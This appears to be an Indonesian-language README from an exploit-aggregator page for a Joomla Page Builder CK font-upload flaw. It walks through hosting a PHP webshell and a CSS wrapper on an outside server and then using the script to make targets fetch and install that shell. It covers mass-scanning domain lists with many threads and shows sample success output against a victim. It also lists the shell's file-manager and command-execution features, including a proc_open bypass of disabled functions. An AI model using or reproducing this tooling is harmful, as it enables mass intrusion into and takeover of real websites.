Share
## https://sploitus.com/exploit?id=DE8E4C54-212E-5C82-B28B-E597C1EEADD4
# CVE-2026-56290 โ Page Builder CK Custom Uploader Exploit
## File Structure
```
/root/pbck-exploit/
โโโ pbck_exploit.py # Exploit script (edit CALLBACK_URL di atas)
โโโ uploader.php # File manager lu (host di server lain)
โโโ font.css # CSS wrapper (host bareng uploader.php)
โโโ hits.txt # Auto-generated: shell URLs yang berhasil
โโโ README.md # File ini
```
## Cara Setup
### Step 1: Edit `uploader.php` (opsional)
- Ganti `$PASSWORD` kalau mau pakai auth
- Default: no password, langsung bisa akses
### Step 2: Host files
Upload `uploader.php` dan `font.css` ke server manapun yang bisa diakses target:
- GitHub raw (gratis, gampang)
- VPS lu sendiri
- Pastebin / any hosting
**PENTING**: `font.css` harus 1 directory level di atas `uploader.php`, atau edit URL langsung.
Format `font.css`:
```css
@font-face { font-family: bb2; src: url(https://YOUR-SERVER.COM/path/uploader.php); }
```
### Step 3: Edit exploit
Buka `pbck_exploit.py`, edit bagian KONFIGURASI:
```python
CALLBACK_URL = "https://raw.githubusercontent.com/username/repo/main"
UPLOADER_FILENAME = "uploader.php"
SHELL_PATH = f"media/com_pagebuilderck/gfonts/{UPLOADER_FILENAME}"
EXPECTED_MARKER = "Uploader" # judul HTML uploader lu
```
### Step 4: Run
```bash
# Single target
python3 pbck_exploit.py -u https://target.com
# Mass scan
python3 pbck_exploit.py -f domains.txt
# Dengan options
python3 pbck_exploit.py -f domains.txt --threads 30 --timeout 15 --insecure
```
## Cara Kerja Exploit
```
1. GET target homepage โ ambil CSRF token
2. POST fonts.save (url=CALLBACK_URL/font.css)
โ Server fetch font.css dari URL lu
โ font.css bilang "src: url(uploader.php)"
โ Server fetch uploader.php
โ Tulis ke media/com_pagebuilderck/gfonts/uploader.php
3. GET target/media/com_pagebuilderck/gfonts/uploader.php
โ Verifikasi shell hidup
```
## Contoh Output
```
[*] Callback : https://your-server.com/shells
[*] Shell path : media/com_pagebuilderck/gfonts/uploader.php
[*] Marker : 'Uploader'
[*] Target : https://victim.com
[+] CSRF token : abc123def456...
[+] Index URL : https://victim.com/index.php
[+] fonts.save : HTTP 200
[+] Shell path : https://victim.com/media/com_pagebuilderck/gfonts/uploader.php (HTTP 200)
[+] Shell title: 'Uploader'
[+] EXPLOIT SUCCESS!
[+] Shell URL: https://victim.com/media/com_pagebuilderck/gfonts/uploader.php
```
## Fitur Uploader
- ๐ Browse files & directories
- โฌ๏ธ Upload files
- โฌ๏ธ Download files
- โ๏ธ Edit files inline
- ๐๏ธ Delete files
- ๐ป Command exec (proc_open โ bypass shell_exec/system disable)
- ๐ Server info
- ๐ JSON API mode (?api=cmd, ?api=ls, ?api=upload, dll)
## Notes
- `font.css` harus accessible dari target server (public URL)
- Kalau target pakai firewall outbound, exploit gagal (gak bisa fetch callback)
- `proc_open` harus enabled di target (biasanya enabled di shared hosting)
- File tertulis ke `media/com_pagebuilderck/gfonts/` โ ini writable di Joomla